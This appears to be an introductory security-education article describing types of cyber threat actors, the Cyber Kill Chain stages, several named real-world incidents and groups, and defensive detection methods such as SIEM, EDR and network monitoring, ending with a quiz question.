A threat actor is an individual, group, or organization that deliberately conducts cyberattacks to exploit system vulnerabilities and achieve specific objectives.
Identifying these actors helps organizations anticipate threats and strengthen their overall security posture.
Did You Know? It's estimated that a hacker strikes every 39 seconds, adding up to over 2,200 attacks per day!
Why Identifying Threat Actors Matters
Targeted Defenses: Enables the development of targeted threat models based on specific attacker behaviors.
Better Investigations: Improves incident investigation and the accuracy of identifying who is responsible (attribution).
Resource Management: Helps prioritize security tools, training, and resources effectively.
Shared Intelligence: Encourages collaboration and threat intelligence sharing across different organizations.
Risk Management: Assists in meeting strict compliance and risk management requirements.
Types of Threat Actors
Threat actors exist in many forms. It is crucial to identify them because each type has entirely different motives, methods, and targets.
1. Cybercriminals
Cybercriminals conduct attacks mainly for financial gain. They operate individually or in highly organized groups, often using tools and services that make cybercrime highly scalable (like "Ransomware-as-a-Service").
Methods: They use ransomware, banking fraud, and data theft to generate profit.
Ecosystem: They operate through underground dark web markets to buy or sell stolen data.
Targets: They frequently exploit third-party services and supply chains to expand their reach to more victims.
Example: Ransomware groups like LockBit and Akira targeting organizations for massive cryptocurrency payments.
2. Nation-State Hackers (State-Sponsored)
Nation-state hackers are backed, funded, and trained by governments to conduct cyber operations for political, military, or economic advantages.
Motives: Long-term strategic goals, global cyber espionage, and large-scale intelligence gathering.
Methods: They use highly advanced, custom techniques like zero-day exploits and Advanced Persistent Threats (APTs).
Targets: Critical sectors such as energy grids, national defense, and telecommunications.
Example: Groups like APT28 (Fancy Bear) involved in sophisticated global cyber espionage activities.
3. Insider Threats
Insider threats come from individuals within an organization who misuse their authorized access. These threats can be intentional (malicious) or entirely accidental.
The Danger: They use valid, trusted credentials to completely bypass external security controls.
Methods: Often involve data leaks due to human error, negligence, or exploiting internal systems and personal devices (BYOD).
Example: An employee accidentally mishandling confidential information, or intentionally downloading sensitive company data to a USB drive before quitting.
4. Hacktivists
Hacktivists use hacking as a tool to promote political, social, or environmental causes.
Goal: To create massive public awareness, protest policies, or embarrass targeted organizations.
Methods: Launching DDoS attacks, defacing public websites, or leaking confidential data to expose organizations.
Example: Groups targeting government or corporate websites during current events to protest controversial policies.
5. Cyber Terrorists
Cyber terrorists aim to create absolute fear, panic, and large-scale physical or digital disruption.
Targets: Critical infrastructure and essential public services (power, healthcare, transportation).
Methods: Using highly destructive malware (like wipers) to cause the maximum amount of damage possible.
Example: Attempts to shut down a city's energy grid or manipulate emergency hospital systems to create public panic.
How Threat Actors Work: The Cyber Kill Chain
Cyber attacks rarely happen by accident. They follow a highly structured approach to successfully breach systems. One widely used model to understand this is the Lockheed Martin Cyber Kill Chain, which breaks down an attack into 7 distinct stages.
Reconnaissance: Attackers gather info about the target using public records (OSINT), social media, or network scanning tools to find entry points.
Weaponization: The attacker creates a malicious payload by combining software exploits with malware.
Delivery: The payload is delivered to the target via phishing emails, malicious attachments, or infected websites (drive-by downloads).
Exploitation: A vulnerability in the system is triggered, allowing the attacker to execute their malicious code and gain initial access.
Installation: Malware or hidden backdoors are installed to ensure the attacker can persistently return to the system later.
Command and Control (C2): The compromised system establishes a secret connection to the attacker’s server, allowing remote control and further instructions.
Actions on Objectives: Attackers finally achieve their goal: stealing data, encrypting files (ransomware), or disrupting services.
Note: Modern attackers often use legitimate, pre-installed system tools ("living-off-the-land") to avoid triggering antivirus alarms.
Real-World Examples of Threat Actor Groups
Commvault SaaS Platform Exploitation (2025): Attackers exploited a zero-day vulnerability (CVE-2025-3928) in the Commvault Metallic SaaS backup platform. They gained access to client secrets used for Microsoft 365 backups, prompting CISA to urge immediate credential rotation.
Oracle Cloud Breach by "rose87168" (2025): A hacker claimed to breach Oracle Cloud infrastructure affecting 6 million records and 140,000 tenants by exploiting CVE-2021-35587. While Oracle denied it, security firm CloudSEK validated the leaked data as plausible.
TA-ShadowCricket: A China-linked threat actor group active for over a decade. They target government and enterprise networks across the Asia-Pacific for extremely stealthy, long-term cyber-espionage.
Lazarus Group (APT38): A highly dangerous North Korean state-sponsored group. They are responsible for the 2014 Sony Pictures hack, the 2017 global WannaCry ransomware outbreak, and the massive $81M Bangladesh Bank SWIFT heist. They heavily rely on spear-phishing and zero-day exploits.
Identifying & Detecting Threat Actors
Threat actors try to remain hidden, but certain "Indicators of Compromise" (IoCs) reveal their presence. Security teams use monitoring, analytics, and threat intelligence to detect attacks early.
1. Monitor Network Traffic
Large data transfers to unknown servers—especially at odd hours—indicate potential data theft.
Tools: Wireshark, Snort, Suricata.
Example: A company PC sending massive amounts of data to a foreign IP address at 3:00 AM strongly signals malware activity.
2. Check Active Network Connections
The netstat command-line tool shows exactly who your computer is communicating with. Unusual or suspicious IP connections running in the background may indicate active backdoors.
3. Analyze Logs with SIEM Tools
Logs capture every login, error, and system change. SIEM (Security Information and Event Management) tools aggregate these logs to spot patterns.
Tools: Splunk, ELK Stack.
Example: Detecting multiple failed logins in a row, unauthorized admin privilege changes, or Microsoft Word launching PowerShell (a classic sign of macro malware).
4. Use Endpoint Detection and Response (EDR)
EDR acts like a hyper-advanced, behavior-based antivirus for endpoints (computers).
Tools: CrowdStrike, SentinelOne.
Example: EDR monitors running programs and will immediately block abnormal actions, such as a script trying to alter computer memory suspiciously.
5. Monitor User Behavior (UEBA)
User and Entity Behavior Analytics (UEBA) tools map out how employees normally act, and sound the alarm when they deviate.
Example: An employee who normally logs in from New York suddenly logs into the network from a completely different country and accesses sensitive HR files they have never opened before.
Knowledge Check
?
According to the Cyber Kill Chain, in which stage does an attacker create a malicious payload by combining exploits with malware?